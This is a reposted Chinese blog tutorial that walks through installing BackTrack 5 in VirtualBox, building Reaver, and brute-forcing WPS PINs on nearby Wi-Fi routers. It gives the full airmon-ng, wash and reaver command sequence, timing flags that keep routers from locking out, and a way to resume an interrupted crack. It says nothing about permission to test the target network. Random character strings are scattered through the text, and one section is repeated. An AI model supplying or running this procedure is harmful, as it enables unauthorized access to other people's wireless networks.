【精品教程】BT5虚拟机版reaver穷举PIN多图教程硬盘保存进度获取支持WPS路由列表...

首先感谢anywlan里面的mns。此贴为他原创！再次感谢。 % [+ c$ S7 K0 g5 m- { bt5 RC3支持网卡：& g9 y; w8 X) j( k+ ~( } }* g: g* P rtl8187, r8187 Ralink RT2870/3070 BCM4312 P' K6 a b" @8 g Ralink RT2501/RT2573 rt2500usb/rt73usb9 K. B7 }! I1 U' y rt2800usb ath9k" q- }3 R/ X) B# U. S, [$ L( k iwl3945 ath5k) z8 [+ z% ?1 O! q' J: G AR9285 : g/ C& o" x% y# e6 g) h zd1211# M [! q, J4 L$ M iwl** BCM4321 f/ ~: ~$ G8 i i BCM4322 @6 t9 N( Z3 D( j Reaver目前只支持以下网卡： ath9k7 H. M2 v8 W( S" g$ \" P2 R0 l2 B rtl8187+ z7 V6 e' ^2 d3 X9 W; h' ~ carl19170; G$ z6 C! y5 V2 J) Z4 s% D8 ^ ipw2000& I& O6 a5 X( b5 H$ K1 t rt2800pci* z! q( x9 `! o. T, \7 X2 V rt73usb x6 i' }1 A+ C- g" p Reaver官方表示暂时不支持：: [3 M: i; y k7 W iwl4965 RT3070L8 G7 M' ?4 n2 c; w) d: \ WG111v3 0 v7 a" {* L5 _" O* O! W& j 选择BT5（虚拟机版）理由：- `8 n' a, x+ _+ Z4 G! A; {3 v- Z* Q 1.网卡支持全、库完整，出错几率小& p6 H" t& C. K9 \1 d 2.虚拟机版免安装，穷举过程进程随时可中止保存到硬盘，进程不丢继续穷举无压力 3.支持VM\VBOX，操作方便无需刻优盘，win下操作一边跑pin一边干活上网3 e3 \6 C% I) D9 ~( s) j! K: I* ^ 4.BT5功能全面、稳定性高、软件版本更新无压力，自主性更强) w/ c( W2 o! ` z6 G$ W" n 5.BT5作用很多，不止可用于跑pin还可以用于诸如词典去合并等繁重工作 参6.无需繁琐的快照功能，随时可中止，随时可继续。就算意外断电进程也不会丢失。 选择Vbox而非VM的原因：7 R( D% x3 v5 S+ P- O% k VBOX体积和占用系统资源更小，网络模式更易调配，虚拟机性能比VM更接近物理机，虽然不如XEN和KVM的虚拟技术，但因为Win环境中因为支持的虚拟磁盘格式更广，同时也有Linux端，因此在Win下比VM要优秀。 % h& E1 k, ~" X4 S 发现很多人纠结BT5占资源高，我做了下测试( @' k7 ?8 I2 u" J1 @ 使用虚拟机分配256M内存已经完全够BT5流畅运行，而09年以后的笔记本、台式机鲜见低于2G内存的，常规使用开个firefox，甚至开个迅雷都可能会占到300M内存，何来性能无法满足之说？ BT5体积稍大倒是诚然，但考虑到它是个完整的操作系统，可以完全当作ubuntu使用，虽然占几G的空间但必然作用大于体积的担忧。 / ^3 ^ d$ R& X0 @! E5 k. x 性能说明，VBOX占内存数值。给虚拟机设置内存768M，实际占用25M，CPU 9%-11%浮动，何来性能低下一说？切勿人云亦云一切用数据说话。 选择BT5（虚拟机版）理由：, j) f9 ~4 v( u* c' r. v5 q9 }7 w7 u 1.网卡支持全、库完整，出错几率小. |$ l( X) R7 b: i7 s& U- v% u/ P 2.虚拟机版免安装，穷举过程进程随时可中止保存到硬盘，进程不丢继续穷举无压力 3.支持VM\VBOX，操作方便无需刻优盘，win下操作一边跑pin一边干活上网 4.BT5功能全面、稳定性高、软件版本更新无压力，自主性更强 5.BT5作用很多，不止可用于跑pin还可以用于诸如词典去合并等繁重工作 6.无需繁琐的快照功能，随时可中止，随时可继续。就算意外断电进程也不会丢失。2 L8 \2 @$ {, K- b 2 x; b! v+ Y! w7 L2 f$ J- y 选择Vbox而非VM的原因：5 f' c8 n) Q" t R VBOX体积和占用系统资源更小，网络模式更易调配，虚拟机性能比VM更接近物理机，虽然不如XEN和KVM的虚拟技术，但因为Win环境中因为支持的虚拟磁盘格式更广，同时也有Linux端，因此在Win下比VM要优秀。 ; ?! {$ T, G9 n" l3 V9 v 发现很多人纠结BT5占资源高，我做了下测试 使用虚拟机分配256M内存已经完全够BT5流畅运行，而09年以后的笔记本、台式机鲜见低于2G内存的，常规使用开个firefox，甚至开个迅雷都可能会占到300M内存，何来性能无法满足之说？/ q/ M% x) z5 k& q) Z- T9 n+ G BT5体积稍大倒是诚然，但考虑到它是个完整的操作系统，可以完全当作ubuntu使用，虽然占几G的空间但必然作用大于体积的担忧。 性能说明，VBOX占内存数值。给虚拟机设置内存768M，实际占用25M，CPU 9%-11%浮动，何来性能低下一说？切勿人云亦云一切用数据说话。 * S$ O! E: ]' y, ?/ J , g& M4 e: R5 K0 _# N 教程：$ d- P8 Z6 b1 z0 d' y7 q) K3 D 1.下载BT5 点击或使用迅雷下载：http://ftp.halifax.rwth-aachen.de/backtrack/BT5-GNOME-VM-32.7z3 s! G# {2 x9 p. p; l3 i / ?5 D' p/ K& @ U6 S. E 2.使用winrar或7z解压，需要至少6G以上剩余硬盘空间。 $ G$ `7 _5 \, o% H- S 3.运行VM/VBOX创建BT5虚拟机（以vbox为例，一通百通，所有虚拟机软件步骤相似） PS,VBOX 4.1.8 Windows 下载地址：http://download.virtualbox.org/v ... 4.1.8-75467-Win.exe 4 v3 l' i5 e) m) n 4.安装：VBOX扩展包 ' E- g+ y9 m* d; q5 }6 t- b 下载地址：http://download.virtualbox.org/v ... -75467.vbox-extpack 下载完成后，双击即可安装至VBOX。6 e9 p( r) z7 \' l& `) w. W 6 J2 S: M/ z. C8 ]: ?5 } 5.添加虚拟机 运行VBOX点击新建 下一步 输入虚拟机名称，选择linux类型( ]7 H; x$ Z! Q( A& E; Z; G / O h) B0 z7 T" z) k7 t ' ?5 S5 _% D, c- U 7 E+ s' Y; r: l+ x8 t- |9 }1 b4 ^ BT5 256-512内存配置绰绰有余 ; N6 G7 t' G7 ? 关键步骤，选择使用现有的虚拟硬盘，点带向上绿箭头的文件夹按钮 7 {; u# Y7 J; P; ^+ B) j; t , o C3 Z5 y& Z! o' T' }: C+ W 找到刚才解压出来的BT5 虚拟机文件的文件夹，选中BT5-GNOME-VM-32.vmdk，点打开' s7 [8 w; H( ]3 j : D! E( z$ l6 j5 Z+ |7 V1 m6 U8 v 点Create Q' ? Z! {; d& |; X$ \+ s 6.运行虚拟机; J5 h2 l5 G' Z2 K3 j: e( D% T, V& G 现在回到了VBOX主界面点上方设置，点USB，点绿色加号按钮，添加USB网卡到USB控制器0 p& P$ f# Q6 Y2 a) n& [8 {) n; G 点确定，回到主界面0 f- s: t. f* I B4 s 点显示，启动BT5虚拟机，输入root，默认密码：toor1 e, h, r0 _- ^6 p5 r 4 E; ]9 N3 D5 A/ D3 _+ o% M, g - Z0 C1 {- n1 Z! R % I/ l8 K1 |4 m/ _ ( Q' k8 u" ~6 M. D* v 输入：startx开启X视图（也可以不输入，图形界面无非操作更直观而已，无有x视图效果是一样的） - d3 p% f# {/ \1 W1 ? 7.安装reaver * B/ ^' @/ E2 B; S# Z d2 O6 V& [" R ' l4 n! }- F! J! u/ y) b7 y 点上方Terminal图标，开启shell$ M/ Y N, K1 g8 ?6 c 7 c) E2 O& R% _5 u/ t. Q 0 i+ W5 l: H' U/ G 输入： cd Desktop 然后输入：（确认vbox使用NAT方式，PC已经联网）& h# C3 i E: T( Y+ Y& ?) [ svn checkout http://reaver-wps.googlecode.com/svn/trunk/reaver-wps-read-only( d3 @3 { n6 H d( M 依次输入：5 w9 Q- i+ d& W' }" [$ n cd reaver-wps-read-only* c8 P/ p. A; ` cd src ./configure, f+ I" L7 P ^! c+ B make( B, l) s' X2 p1 L9 _ make install' i$ ?2 C4 W' X , j# ^9 S* \1 Z, d5 _5 H. w" n 另外如果安装过程中出现bash: ./configure: Permission denied，不要着急这是linux下常见问题) c6 D2 ?) @' K% ]! T: t 运行/ j2 z& T2 Q1 T# G& A [ chmod +x configure，然后再运行./configure B1 r4 u: v5 ~" r0 x 或 sh ./configure 假如未联网，或Vbox联网故障，尝试下下面这个方法： 1 W: c" r& Q: D5 r8 o4 S 1)在Windows下，前往 http://code.google.com/p/reaver-wps/downloads/list选择最新正式版下载/ l; f7 r7 P: Y- `. a- s 点击最新版文件名，如点击 reaver-1.4.tar.gz（或未来更高版本）' ]: ~0 Y& k% }9 o. ~+ V 点击文件名，如点击绿色背景中的reaver-1.4.tar.gz- a: q' U5 X$ D. j: j0 s& G 2)使用Winrar或则7zip解压reaver-1.4.tar.gz文件，拷贝src文件夹到U盘. @4 e0 _7 r5 r 5 T' B3 A( B% V, m) d * J! e3 ^1 P: R$ u3 r 3)回到Vbox，打开正在运行的BT5虚拟机，点击设备-->分配USB设备-->选中优盘* G p3 C4 \0 _% ] % }2 l# @2 @* n/ M 0 b0 I* o- r/ y: L0 E 4)稍等片刻，优盘图标就出现在了Bt5桌面，双击打开优盘，右击src文件夹，点copy 8 p. I' s$ {( k 5)右击BT5桌面空白处，点paste将src文件夹，拷贝到桌面上。 + ]3 s% O* v: `( Q3 m! p 6)点上方Terminal图标，逐条运行以下指令： 1 Y4 D2 J6 ^, F" Y4 m4 W cd /root/Desktop/src+ \8 r' G$ d7 F4 e/ ] ./configure4 `+ _- g9 \. g% @' Z9 G* B/ o make make install至此reaver安装完成。* O( W; Q6 o# R5 u! i' a 8.开启监听模式，并搜索支持wps的ap， 支好天线，准备开始干活。 6 e+ ]9 ^0 U& p7 ^* Y3 i, s1 ? 9 h' V* s0 }; } h6 E: j9 d * R$ O! \: x0 S6 { U . w( U1 V5 ]9 V, y. o3 o( ?7 E 输入：' m ?+ I @( ~3 G( \ k4 o airmon-ng start wlan0 5 P2 p( W: D" A3 n+ ^& r 输入： wash -i mon0 -C (注意大小写)6 w3 J; ]0 X K2 v! v 查看支持WPS的AP 长时间无反应按Ctrl+C，结束进程 9.开始穷举：3 `2 J& H; y$ Z6 l& t! Z 8 `% J9 u O5 e( k) W5 r! y- {8 D 输入： reaver -i mon0 -b MAC地址 -a -S -vv （注意大小写） 建议增加 -d 3 -t 3参数，防止路由WPS被跑死，导致穷举中止。% n, L# u2 q8 O. u reaver -i mon0 -b MAC地址 -a -S -vv -d 3 -t 3' q( t; `6 @( m% i8 G 好了，虚拟机最小化，该玩就玩该干嘛干嘛去吧，慢慢等着穷举结束。, a2 S. z* t( z% c: v+ C4 g, D/ t 最后说下保存进度方法：5 I6 `2 X. n+ k: j& H7 N$ e. a9 L' D 4 g: e2 x( v+ a 1)在穷举过程中随时可按Ctrl+C结束进程；5 Z8 z5 {! B- i/ K) c 2)无论何时，只要再跑之前跑过的MAC地址，进程都是连续的无需从0%重新开始，这是硬盘版的好处。根本用不着快照功能。 ( p9 T2 ?& [' M" c+ A 3)小技巧：下次启动BT5按下光标控制键（方向键）“上”键然后回车，就可以看到上次输入的指令，无需再输入，选中上次没跑完的指令按下回车继续跑。（需上次正常关机，X视图使用右上角关机按钮关机或在终端输入shutdown -q 0关机）

转载于:https://blog.51cto.com/584250550/1305055